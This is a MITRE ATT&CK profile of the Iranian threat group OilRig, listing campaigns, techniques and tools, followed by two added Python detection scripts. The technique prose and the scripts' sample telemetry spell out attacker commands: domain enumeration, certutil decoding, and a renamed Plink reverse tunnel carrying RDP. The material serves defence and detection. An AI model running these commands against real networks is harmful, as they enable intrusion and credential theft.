OilRig, COBALT GYPSY, IRN2, APT34, Helix Kitten, Evasive Serpens, Hazel Sandstorm, EUROPIUM, ITG13, Earth Simnavaz, Crambus, TA452, Group G0049 | MITRE ATT&CK®
OilRig
OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group is assessed to work on behalf of the Iranian government, based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. [1] [2] [3] [4] [5] [6] [7]
ID: G0049
Associated Groups : COBALT GYPSY, IRN2, APT34, Helix Kitten, Evasive Serpens, Hazel Sandstorm, EUROPIUM, ITG13, Earth Simnavaz, Crambus, TA452
Contributors : Robert Falcone; Bryan Lee; Dragos Threat Intelligence; Jaesang Oh, KC7 Foundation
Version : 5.0
Created: 14 December 2017
Last Modified: 16 January 2025
Associated Group Descriptions
Name
Description
COBALT GYPSY
[8]
IRN2
[9]
APT34
APT34 and OilRig were previously tracked as two distinct groups but were merged after additional reporting gave higher confidence in the overlap of their activity. [7] [1] [10]
Helix Kitten
[7] [9]
Evasive Serpens
[6]
Hazel Sandstorm
[11]
EUROPIUM
[11]
ITG13
[12]
Earth Simnavaz
[13]
Crambus
[14]
TA452
[15]
Campaigns
ID
Name
First Seen
Last Seen
References
Techniques
C0044
Juicy Mix
January 2022 [16]
December 2022 [16]
[16]
Application Layer Protocol : Web Protocols , Browser Information Discovery , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Visual Basic , Compromise Infrastructure : Server , Credentials from Password Stores : Windows Credential Manager , Credentials from Password Stores : Credentials from Web Browsers , Data Encoding : Standard Encoding , Data Staged : Local Data Staging , Deobfuscate/Decode Files or Information , Develop Capabilities : Malware , Scheduled Task/Job : Scheduled Task , Software Discovery , System Information Discovery
C0042
Outer Space
January 2021 [16]
December 2021 [16]
[16]
Application Layer Protocol : Web Protocols , Browser Information Discovery , Command and Scripting Interpreter : Visual Basic , Compromise Infrastructure : Server , Develop Capabilities : Malware , Establish Accounts : Cloud Accounts , Ingress Tool Transfer , Obfuscated Files or Information : Encrypted/Encoded File
Techniques Used
Domain
ID
Name
Use
Enterprise
T1087
.001
Account Discovery : Local Account
OilRig has run net user, net user /domain, net group "domain admins" /domain, and net group "Exchange Trusted Subsystem" /domain to get account listings on a victim. [4]
.002
Account Discovery : Domain Account
OilRig has run net user, net user /domain, net group "domain admins" /domain, and net group "Exchange Trusted Subsystem" /domain to get account listings on a victim. [4]
Enterprise
T1583
.001
Acquire Infrastructure : Domains
OilRig has set up fake VPN portals, conference sign ups, and job application websites to target victims. [3]
Enterprise
T1071
.001
Application Layer Protocol : Web Protocols
OilRig has used HTTP for C2. [6] [17] [18]
During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers, including via the Microsoft Exchange Web Services API. [16]
During Juicy Mix , OilRig used a VBS script to send POST requests to register installed malware with C2. [16]
.004
Application Layer Protocol : DNS
OilRig has used DNS for C2, including the publicly available requestbin.net tunneling service. [6] [17] [18] [10]
Enterprise
T1119
Automated Collection
OilRig has used automated collection. [6]
Enterprise
T1217
Browser Information Discovery
During Outer Space , OilRig used a Chrome data dumper named MKG. [16]
During Juicy Mix , OilRig used the CDumper (Chrome browser) and EDumper (Edge browser) data stealers to collect cookies, browsing history, and credentials. [16]
Enterprise
T1110
Brute Force
OilRig has used brute force techniques to obtain credentials. [17] [12]
Enterprise
T1115
Clipboard Data
OilRig has used infostealer tools to copy clipboard data. [14]
Enterprise
T1059
Command and Scripting Interpreter
OilRig has used various types of scripting for execution. [1] [19] [20] [7] [21]
.001
PowerShell
OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents. [1] [22] [9] [13]
During Juicy Mix , OilRig used a PowerShell script to steal credentials. [16]
.003
Windows Command Shell
OilRig has used macros to deliver malware such as QUADAGENT and OopsIE . [1] [19] [20] [7] [21] OilRig has used batch scripts. [1] [19] [20] [7] [21]
.005
Visual Basic
OilRig has used VBScript macros for execution on compromised hosts. [10]
During Outer Space , OilRig used VBS droppers to deploy malware. [16]
During Juicy Mix , OilRig used VBS droppers to deliver and establish persistence for the Mango backdoor. [16]
Enterprise
T1586
.002
Compromise Accounts : Email Accounts
OilRig has compromised email accounts to send phishing emails. [3]
Enterprise
T1584
.004
Compromise Infrastructure : Server
During Outer Space , OilRig compromised an Israeli human resources site to use as a C2 server. [16]
During Juicy Mix , OilRig compromised an Israeli job portal to use for a C2 server. [16]
Enterprise
T1543
.003
Create or Modify System Process : Windows Service
OilRig has used a compromised Domain Controller to create a service on a remote host. [14]
Enterprise
T1555
Credentials from Password Stores
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
.003
Credentials from Web Browsers
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18] OilRig has also used a tool named PICKPOCKET to dump passwords from web browsers. [18]
During Juicy Mix , OilRig used the CDumper (Chrome browser) and EDumper (Edge browser) to collect credentials. [16]
.004
Windows Credential Manager
OilRig has used a credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager. [18]
During Juicy Mix , OilRig used a Windows Credential Manager stealer for credential access. [16]
Enterprise
T1132
.001
Data Encoding : Standard Encoding
During Juicy Mix , OilRig used a VBS script to send the Base64-encoded name of the compromised computer to C2. [16]
Enterprise
T1005
Data from Local System
OilRig has used PowerShell to upload files from compromised systems. [13]
Enterprise
T1025
Data from Removable Media
OilRig has used Wireshark’s usbcapcmd utility to capture USB traffic. [14]
Enterprise
T1074
.001
Data Staged : Local Data Staging
During Juicy Mix , OilRig used browser data and credential stealer tools to stage stolen files named Cupdate, Eupdate, and IUpdate in the %TEMP% directory. [16]
Enterprise
T1140
Deobfuscate/Decode Files or Information
An OilRig macro has run a PowerShell command to decode file contents. OilRig has also used certutil to decode base64-encoded files on victims. [1] [22] [20] [24]
During Juicy Mix , OilRig used a script to concatenate and deobfuscate encoded strings in Mango . [16]
Enterprise
T1587
.001
Develop Capabilities : Malware
OilRig actively developed and used a series of downloaders during 2022. [25]
For Outer Space , OilRig created new implants including the Solar backdoor. [16]
For Juicy Mix , OilRig improved on Solar by developing the Mango backdoor. [16]
Enterprise
T1573
.002
Encrypted Channel : Asymmetric Cryptography
OilRig used the PowerExchange utility and other tools to create tunnels to C2 servers. [17]
Enterprise
T1585
.003
Establish Accounts : Cloud Accounts
During Outer Space , OilRig created M365 email accounts to be used as part of C2. [16]
Enterprise
T1048
.003
Exfiltration Over Alternative Protocol : Exfiltration Over Unencrypted Non-C2 Protocol
OilRig has exfiltrated data via Microsoft Exchange and over FTP separately from its primary C2 channel over DNS. [5] [13]
Enterprise
T1203
Exploitation for Client Execution
OilRig has exploited CVE-2024-30088 to run arbitrary code in the context of SYSTEM . [13]
Enterprise
T1068
Exploitation for Privilege Escalation
OilRig has exploited the Windows Kernel Elevation of Privilege vulnerability, CVE-2024-30088. [13]
Enterprise
T1133
External Remote Services
OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment. [17]
Enterprise
T1008
Fallback Channels
OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP. [19]
Enterprise
T1562
.004
Impair Defenses : Disable or Modify System Firewall
OilRig has modified Windows firewall rules to enable remote access. [14]
Enterprise
T1070
.004
Indicator Removal : File Deletion
OilRig has deleted files associated with their payload after execution. [1] [20]
Enterprise
T1105
Ingress Tool Transfer
OilRig has downloaded remote files onto victim infrastructure. [1] [13]
During Outer Space, OilRig downloaded additional tools to compromised infrastructure. [16]
Enterprise
T1056
.001
Input Capture : Keylogging
OilRig has employed keyloggers including KEYPUNCH and LONGWATCH. [17] [18] [14]
Enterprise
T1036
Masquerading
OilRig has used .doc file extensions to mask malicious executables. [10]
.005
Match Legitimate Resource Name or Location
OilRig has named a downloaded copy of the Plink tunneling utility as \ProgramData\Adobe.exe. [14]
Enterprise
T1556
.002
Modify Authentication Process : Password Filter DLL
OilRig has registered a password filter DLL in order to drop malware. [13]
Enterprise
T1112
Modify Registry
OilRig has used reg.exe to modify system configuration. [14] [13]
Enterprise
T1046
Network Service Discovery
OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning. [17]
Enterprise
T1027
.005
Obfuscated Files or Information : Indicator Removal from Tools
OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion. [2] [21]
.013
Obfuscated Files or Information : Encrypted/Encoded File
OilRig has encrypted and encoded data in its malware, including by using base64. [1] [7] [6] [9] [21]
During Outer Space , OilRig deployed VBS droppers with obfuscated strings. [16]
Enterprise
T1588
.002
Obtain Capabilities : Tool
OilRig has made use of publicly available tools including Plink and Mimikatz . [14] [13]
.003
Obtain Capabilities : Code Signing Certificates
OilRig has obtained stolen code signing certificates to digitally sign malware. [3]
Enterprise
T1137
.004
Office Application Startup : Outlook Home Page
OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse. [26]
Enterprise
T1003
.001
OS Credential Dumping : LSASS Memory
OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
.004
OS Credential Dumping : LSA Secrets
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
.005
OS Credential Dumping : Cached Domain Credentials
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
Enterprise
T1201
Password Policy Discovery
OilRig has used net.exe in a script with net accounts /domain to find the password policy of a domain. [27]
Enterprise
T1120
Peripheral Device Discovery
OilRig has used tools to identify if a mouse is connected to a targeted system. [10]
Enterprise
T1069
.001
Permission Groups Discovery : Local Groups
OilRig has used net localgroup administrators to find local administrators on compromised systems. [4] [14]
.002
Permission Groups Discovery : Domain Groups
OilRig has used net group /domain, net group "domain admins" /domain, and net group "Exchange Trusted Subsystem" /domain to find domain group permission settings. [4]
Enterprise
T1566
.001
Phishing : Spearphishing Attachment
OilRig has sent spearphishing emails with malicious attachments to potential victims using compromised and/or spoofed email accounts. [20] [7] [9] [3]
.002
Phishing : Spearphishing Link
OilRig has sent spearphishing emails with malicious links to potential victims. [20] [3]
.003
Phishing : Spearphishing via Service
OilRig has used LinkedIn to send spearphishing links. [18]
Enterprise
T1057
Process Discovery
OilRig has run tasklist on a victim's machine and used infostealers to capture processes. [4] [14]
Enterprise
T1572
Protocol Tunneling
OilRig has used the Plink utility and other tools to create tunnels to C2 servers. [6] [17] [18] [14]
Enterprise
T1012
Query Registry
OilRig has used reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" on a victim to query the Registry. [4]
Enterprise
T1219
Remote Access Tools
OilRig has incorporated remote monitoring and management (RMM) tools into their operations including ngrok . [13]
Enterprise
T1021
.001
Remote Services : Remote Desktop Protocol
OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment. [6] [17] [24] [14]
.004
Remote Services : SSH
OilRig has used PuTTY to access compromised systems. [6]
Enterprise
T1053
.005
Scheduled Task/Job : Scheduled Task
OilRig has created scheduled tasks that run a VBScript to execute a payload on victim machines. [20] [7] [18] [10]
During Juicy Mix , OilRig used VBS droppers to schedule tasks for persistence. [16]
Enterprise
T1113
Screen Capture
OilRig has a tool called CANDYKING to capture a screenshot of the user's desktop. [17]
Enterprise
T1505
.003
Server Software Component : Web Shell
OilRig has used web shells, often to maintain access to a victim network. [6] [17] [24] [13]
Enterprise
T1518
Software Discovery
During Juicy Mix , OilRig used browser data dumper tools to create a list of users with Google Chrome installed. [16]
Enterprise
T1608
.001
Stage Capabilities : Upload Malware
OilRig has hosted malware on fake websites designed to target specific audiences. [3]
Enterprise
T1553
.002
Subvert Trust Controls : Code Signing
OilRig has signed its malware with stolen certificates. [3]
Enterprise
T1195
Supply Chain Compromise
OilRig has leveraged compromised organizations to conduct supply chain attacks on government entities. [13]
Enterprise
T1218
.001
System Binary Proxy Execution : Compiled HTML File
OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim. [4]
Enterprise
T1082
System Information Discovery
OilRig has run hostname and systeminfo on a victim. [4] [5] [18] [10] [14]
During Juicy Mix , OilRig used a script to send the name of the compromised host via HTTP POST to register it with C2. [16]
Enterprise
T1016
System Network Configuration Discovery
OilRig has run ipconfig /all on a victim. [4] [5]
Enterprise
T1049
System Network Connections Discovery
OilRig has used netstat -an on a victim to get a listing of network connections. [4]
Enterprise
T1033
System Owner/User Discovery
OilRig has run whoami on a victim. [4] [5] [10]
Enterprise
T1007
System Service Discovery
OilRig has used sc query on a victim to gather information about services. [4]
Enterprise
T1552
.001
Unsecured Credentials : Credentials In Files
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
Enterprise
T1204
.001
User Execution : Malicious Link
OilRig has delivered malicious links to achieve execution on the target system. [20] [7] [9] [3]
.002
User Execution : Malicious File
OilRig has delivered macro-enabled documents that required targets to click the "enable content" button to execute the payload on the system. [20] [7] [9] [10] [3]
Enterprise
T1078
Valid Accounts
OilRig has used compromised credentials to access other systems on a victim network. [6] [17] [24] [12]
.002
Domain Accounts
OilRig has used an exfiltration tool named STEALHOOK to retrieve valid domain credentials. [13]
Enterprise
T1497
.001
Virtualization/Sandbox Evasion : System Checks
OilRig has used macros to verify if a mouse is connected to a compromised machine. [10]
Enterprise
T1047
Windows Management Instrumentation
OilRig has used WMI for execution. [17] [14]
ICS
T0817
Drive-by Compromise
OilRig has been seen using watering hole attacks to collect credentials that could be used to gain access to ICS networks. [28]
ICS
T0853
Scripting
OilRig has embedded a macro within spearphishing attachments made up of both a VBScript and a PowerShell script. [29]
ICS
T0865
Spearphishing Attachment
OilRig used spearphishing emails with malicious Microsoft Excel spreadsheet attachments. [29]
ICS
T0869
Standard Application Layer Protocol
OilRig communicated with its command and control using HTTP requests. [29]
ICS
T0859
Valid Accounts
OilRig utilized stolen credentials to gain access to victim machines. [30]
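The discovery chain listed above (whoami, hostname, net user /domain, net group "domain admins" /domain, net group "Exchange Trusted Subsystem" /domain, the reg query of the Terminal Server Client key, netstat -an, sc query, tasklist), the certutil decoding under T1140, and the renamed Plink copy used to tunnel RDP under T1036.005 and T1572 are all visible in process-creation telemetry. The Python below is an added example written for this page, not MITRE's or any cited vendor's detection content: it matches Sysmon Event ID 1 / Security 4688-style records against those commands and alerts when one host shows several distinct discovery techniques inside a short window, or a single Plink-style reverse tunnel launched from a binary not named plink. The regular expressions, thresholds, event records, host names and user names are constructed for the example.

```python
"""Triage process-creation records (Sysmon Event ID 1 / Security 4688 shape) for
the OilRig discovery chain, certutil decoding, and a renamed Plink tunnelling RDP.
Added example for this page: the ATT&CK IDs are the ones the page maps to the
group; the regexes, thresholds and sample events are constructed, not vendor rules."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each pattern is applied to a normalised command line (see normalize()).
PATTERNS = [(label, re.compile(rx)) for label, rx in [
    ("T1087 net user",                                 r"^net1?(?:\.exe)?\s+user\b"),
    ("T1069.002 net group Domain Admins",              r"^net1?(?:\.exe)?\s+group\s+domain admins\s+/domain"),
    ("T1069.002 net group Exchange Trusted Subsystem", r"^net1?(?:\.exe)?\s+group\s+exchange trusted subsystem\s+/domain"),
    ("T1069.001 net localgroup administrators",        r"^net1?(?:\.exe)?\s+localgroup\s+administrators"),
    ("T1201 net accounts /domain",                     r"^net1?(?:\.exe)?\s+accounts\s+/domain"),
    ("T1012 reg query Terminal Server Client",         r"^reg(?:\.exe)?\s+query\s+.*terminal server client"),
    ("T1082 hostname/systeminfo",                      r"^(?:hostname|systeminfo)(?:\.exe)?(?:\s|$)"),
    ("T1016 ipconfig /all",                            r"^ipconfig(?:\.exe)?\s+/all"),
    ("T1049 netstat -an",                              r"^netstat(?:\.exe)?\s+-an\b"),
    ("T1033 whoami",                                   r"^whoami(?:\.exe)?(?:\s|$)"),
    ("T1007 sc query",                                 r"^sc(?:\.exe)?\s+query(?:\s|$)"),
    ("T1057 tasklist",                                 r"^tasklist(?:\.exe)?(?:\s|$)"),
    ("T1140 certutil -decode",                         r"^certutil(?:\.exe)?\s+.*-decode\b"),
]]
# A reverse-tunnel argument in plink/ssh syntax, e.g. "-R 0.0.0.0:12345:127.0.0.1:3389"
TUNNEL_ARGS = re.compile(r"(?:^|\s)-r\s+\S+:\d+:\S+:\d+(?:\s|$)")
HIGH_CONFIDENCE = ("T1036.005", "T1140", "T1572")  # one hit is enough to alert


def normalize(cmdline: str) -> str:
    """Drop quotes and the directory of the first token and lower-case, so
    '"C:\\Windows\\System32\\net1.exe" group "domain admins" /domain'
    becomes 'net1.exe group domain admins /domain'."""
    cmd = " ".join(cmdline.replace('"', "").split())
    first, _, rest = cmd.partition(" ")
    exe = first.rsplit("\\", 1)[-1]
    return f"{exe} {rest}".strip().lower()


def classify(cmdline: str) -> list[str]:
    """Return the technique labels a single command line matches."""
    cmd = normalize(cmdline)
    labels = [label for label, rx in PATTERNS if rx.search(cmd)]
    if TUNNEL_ARGS.search(cmd):
        if not cmd.split(" ", 1)[0].startswith("plink"):
            labels.append("T1036.005 reverse tunnel from binary not named plink")
        if ":3389" in cmd:
            labels.append("T1572/T1021.001 RDP carried inside the tunnel")
    return labels


def triage(events, window=timedelta(minutes=30), min_distinct=4):
    """Per host, find the largest set of distinct labels inside any `window`
    and alert on breadth (min_distinct) or on one high-confidence hit."""
    per_host = defaultdict(list)
    for ev in events:
        labels = classify(ev["cmdline"])
        if labels:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), ev["user"], labels))
    report = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        best: set[str] = set()
        for i, (t0, _, _) in enumerate(hits):
            seen: set[str] = set()
            for t, _, labels in hits[i:]:
                if t - t0 > window:
                    break
                seen.update(labels)
            best = seen if len(seen) > len(best) else best
        report[host] = {
            "users": sorted({u for _, u, _ in hits}),
            "labels": sorted(best),
            "alert": len(best) >= min_distinct or any(l.startswith(HIGH_CONFIDENCE) for l in best),
        }
    return report


SAMPLE_EVENTS = [  # constructed telemetry: one benign admin, one host showing the chain
    {"time": "2024-03-04T09:58:00", "host": "WS02", "user": "it-admin", "cmdline": "ipconfig /all"},
    {"time": "2024-03-04T10:00:10", "host": "WS01", "user": "j.doe", "cmdline": "whoami"},
    {"time": "2024-03-04T10:00:12", "host": "WS01", "user": "j.doe", "cmdline": "hostname"},
    {"time": "2024-03-04T10:00:40", "host": "WS01", "user": "j.doe", "cmdline": '"C:\\Windows\\System32\\net1.exe" user /domain'},
    {"time": "2024-03-04T10:01:05", "host": "WS01", "user": "j.doe", "cmdline": 'net group "domain admins" /domain'},
    {"time": "2024-03-04T10:01:09", "host": "WS01", "user": "j.doe", "cmdline": 'net group "Exchange Trusted Subsystem" /domain'},
    {"time": "2024-03-04T10:02:30", "host": "WS01", "user": "j.doe", "cmdline": 'reg query "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default"'},
    {"time": "2024-03-04T10:03:00", "host": "WS01", "user": "j.doe", "cmdline": "netstat -an"},
    {"time": "2024-03-04T10:20:00", "host": "WS01", "user": "j.doe", "cmdline": "C:\\ProgramData\\Adobe.exe -N -R 0.0.0.0:12345:127.0.0.1:3389 svc@203.0.113.10 -pw REDACTED"},
]

if __name__ == "__main__":
    for host, info in triage(SAMPLE_EVENTS).items():
        print(host, "ALERT" if info["alert"] else "ok", info["users"], *info["labels"], sep="\n  ")
```

The breadth threshold is what separates an administrator running one `ipconfig /all` from an operator walking the whole chain; the Plink rule fires on its own because a reverse tunnel from a binary with an unrelated name has no benign reading. Tune `window` and `min_distinct` against your own baseline before deploying.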
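Two of the persistence techniques above leave a registry footprint that can be audited offline from a reg export: the password filter DLL under T1556.002 appears in the Notification Packages value of HKLM\SYSTEM\CurrentControlSet\Control\Lsa, and an abused Outlook folder home page under T1137.004 appears as a URL value under HKCU\Software\Microsoft\Office\<version>\Outlook\WebView\<folder>, with the post-patch UI removal reversible through the EnableRoamingFolderHomepages value described in the Mandiant write-up cited as [26]. The Python below is an added example, not code from MITRE or from the cited reports: it parses a constructed .reg export (including the UTF-16LE hex(7) encoding regedit uses for REG_MULTI_SZ) and reports entries outside a baseline. The DLL name pwfilt, the URL, and the exact EnableRoamingFolderHomepages key are assumptions for illustration; rassfm is in the baseline because domain controllers register it by default.

```python
"""Offline audit of a .reg export for two OilRig persistence footprints on this
page: a password filter DLL (T1556.002) and an Outlook folder home page
(T1137.004). Added example; the parser, baseline and sample export are constructed,
and the sample's DLL name, URL and the Security-key location are assumptions."""

BASELINE_PASSWORD_FILTERS = {"scecli", "rassfm"}  # scecli everywhere, rassfm on domain controllers
LSA_KEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa"


def decode_value(val: str):
    """Decode the value syntaxes a .reg export uses: "string", dword:hex, and
    hex(7): for REG_MULTI_SZ (UTF-16LE, NUL-separated, double-NUL terminated)."""
    if val.startswith('"') and val.endswith('"'):
        return val[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if val.startswith("dword:"):
        return int(val[len("dword:"):], 16)
    if val.startswith("hex(7):"):
        raw = bytes(int(b, 16) for b in val[len("hex(7):"):].split(",") if b)
        return [s for s in raw.decode("utf-16-le").split("\x00") if s]
    return val  # other hex(n) types are left undecoded


def parse_reg_export(text: str) -> dict[str, dict[str, object]]:
    """Return {key path: {value name: decoded value}}, joining the backslash
    continuation lines that regedit emits for long hex values."""
    keys, cur, buf = {}, None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            keys.setdefault(cur, {})
            continue
        buf += line
        if buf.endswith("\\"):  # value continues on the next line
            buf = buf[:-1]
            continue
        name, _, val = buf.partition("=")
        buf = ""
        if cur is not None:
            keys[cur]["(Default)" if name == "@" else name.strip('"')] = decode_value(val)
    return keys


def audit(reg: dict) -> list[str]:
    """Report non-baseline password filters and any Outlook folder home page."""
    findings = []
    for dll in reg.get(LSA_KEY, {}).get("Notification Packages", []):
        if dll.lower() not in BASELINE_PASSWORD_FILTERS:
            findings.append(f"T1556.002 non-baseline password filter DLL: {dll}")
    for key, values in reg.items():
        k = key.lower()
        if "\\outlook\\webview\\" in k and values.get("URL"):
            findings.append(f"T1137.004 Outlook folder home page set: {key} -> {values['URL']}")
        # Assumed location of the re-enable switch (Mandiant write-up, ref [26]); verify per Office build
        if k.endswith("\\outlook\\security") and values.get("EnableRoamingFolderHomepages") == 1:
            findings.append(f"T1137.004 roaming folder home pages re-enabled: {key}")
    return findings


SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,72,00,\
  61,00,73,00,73,00,66,00,6d,00,00,00,70,00,77,00,66,00,69,00,6c,00,74,00,00,\
  00,00,00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\WebView\Inbox]
"URL"="http://svc-update.test/home.html"

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security]
"EnableRoamingFolderHomepages"=dword:00000001
"""

if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_REG)):
        print(finding)
```

Run it against a real export with `reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa lsa.reg` and the per-user Office key; a filter DLL that is not scecli (or rassfm on a DC) is loaded by LSASS on every password change and warrants immediate collection of the file it names.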
Software
ID
Name
References
Techniques
S0360
BONDUPDATER
[1] [31]
Application Layer Protocol : DNS , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Dynamic Resolution : Domain Generation Algorithms , Hide Artifacts : Hidden Window , Ingress Tool Transfer , Scheduled Task/Job : Scheduled Task
S0160
certutil
[1] [14]
Archive Collected Data : Archive via Utility , Deobfuscate/Decode Files or Information , Ingress Tool Transfer , Subvert Trust Controls : Install Root Certificate
S0095
ftp
[5]
Exfiltration Over Alternative Protocol : Exfiltration Over Unencrypted Non-C2 Protocol , Ingress Tool Transfer , Lateral Tool Transfer
S0170
Helminth
[4] [17] [9]
Application Layer Protocol : DNS , Application Layer Protocol : Web Protocols , Automated Collection , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Boot or Logon Autostart Execution : Shortcut Modification , Clipboard Data , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : Windows Command Shell , Data Encoding : Standard Encoding , Data Staged : Local Data Staging , Data Transfer Size Limits , Encrypted Channel : Symmetric Cryptography , Ingress Tool Transfer , Input Capture : Keylogging , Obfuscated Files or Information : Encrypted/Encoded File , Permission Groups Discovery : Local Groups , Permission Groups Discovery : Domain Groups , Process Discovery , Scheduled Task/Job : Scheduled Task , Subvert Trust Controls : Code Signing
S0100
ipconfig
[4]
System Network Configuration Discovery
S0189
ISMInjector
[22]
Deobfuscate/Decode Files or Information , Obfuscated Files or Information , Process Injection : Process Hollowing , Scheduled Task/Job : Scheduled Task
S0349
LaZagne
[23]
Credentials from Password Stores : Windows Credential Manager , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores , Credentials from Password Stores : Keychain , OS Credential Dumping : LSA Secrets , OS Credential Dumping : /etc/passwd and /etc/shadow , OS Credential Dumping : LSASS Memory , OS Credential Dumping : Cached Domain Credentials , OS Credential Dumping : Proc Filesystem , Unsecured Credentials : Credentials In Files
S1169
Mango
[16]
Application Layer Protocol : Web Protocols , Data Encoding : Standard Encoding , Encrypted Channel : Symmetric Cryptography , Encrypted Channel : Asymmetric Cryptography , Exfiltration Over C2 Channel , File and Directory Discovery , Impair Defenses : Disable or Modify Tools , Native API , Obfuscated Files or Information : Encrypted/Encoded File , Scheduled Task/Job : Scheduled Task , System Information Discovery , System Owner/User Discovery , User Execution : Malicious File
S0002
Mimikatz
[6] [17] [23] [14]
Access Token Manipulation : SID-History Injection , Account Manipulation , Boot or Logon Autostart Execution : Security Support Provider , Credentials from Password Stores , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores : Windows Credential Manager , OS Credential Dumping : DCSync , OS Credential Dumping : Security Account Manager , OS Credential Dumping : LSASS Memory , OS Credential Dumping : LSA Secrets , Rogue Domain Controller , Steal or Forge Authentication Certificates , Steal or Forge Kerberos Tickets : Golden Ticket , Steal or Forge Kerberos Tickets : Silver Ticket , Unsecured Credentials : Private Keys , Use Alternate Authentication Material : Pass the Hash , Use Alternate Authentication Material : Pass the Ticket
S0039
Net
[4] [1] [14]
Account Discovery : Domain Account , Account Discovery : Local Account , Account Manipulation : Additional Local or Domain Groups , Create Account : Local Account , Create Account : Domain Account , Indicator Removal : Network Share Connection Removal , Network Share Discovery , Password Policy Discovery , Permission Groups Discovery : Domain Groups , Permission Groups Discovery : Local Groups , Remote Services : SMB/Windows Admin Shares , Remote System Discovery , System Network Connections Discovery , System Service Discovery , System Services : Service Execution , System Time Discovery
S0104
netstat
[4] [1] [14]
System Network Connections Discovery
S0508
ngrok
[13]
Dynamic Resolution : Domain Generation Algorithms , Exfiltration Over Web Service , Protocol Tunneling , Proxy , Web Service
S1170
ODAgent
[25]
Command and Scripting Interpreter : Windows Command Shell , Deobfuscate/Decode Files or Information , Exfiltration Over C2 Channel , Exfiltration Over Web Service : Exfiltration to Cloud Storage , File and Directory Discovery , Indicator Removal : File Deletion , Ingress Tool Transfer , Native API , Web Service : Bidirectional Communication
S1172
OilBooster
[25]
Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Windows Command Shell , Data Staged : Local Data Staging , Deobfuscate/Decode Files or Information , Encrypted Channel : Asymmetric Cryptography , Exfiltration Over C2 Channel , Exfiltration Over Web Service : Exfiltration to Cloud Storage , Fallback Channels , Hide Artifacts : Hidden Window , Ingress Tool Transfer , Inter-Process Communication , Native API , System Information Discovery , System Owner/User Discovery , Web Service : Bidirectional Communication
S1171
OilCheck
[25]
Exfiltration Over Web Service , Ingress Tool Transfer , Web Service : Bidirectional Communication
S0264
OopsIE
[20]
Application Layer Protocol : Web Protocols , Archive Collected Data : Archive via Custom Method , Archive Collected Data : Archive via Utility , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : Visual Basic , Data Encoding : Standard Encoding , Data Staged : Local Data Staging , Data Transfer Size Limits , Deobfuscate/Decode Files or Information , Exfiltration Over C2 Channel , Indicator Removal : File Deletion , Ingress Tool Transfer , Obfuscated Files or Information : Software Packing , Obfuscated Files or Information , Scheduled Task/Job : Scheduled Task , System Information Discovery , System Time Discovery , Virtualization/Sandbox Evasion : System Checks , Windows Management Instrumentation
S1173
PowerExchange
[14]
Application Layer Protocol : Mail Protocols , Command and Scripting Interpreter : PowerShell , Deobfuscate/Decode Files or Information , Exfiltration Over C2 Channel , Ingress Tool Transfer
S0184
POWRUNER
[1]
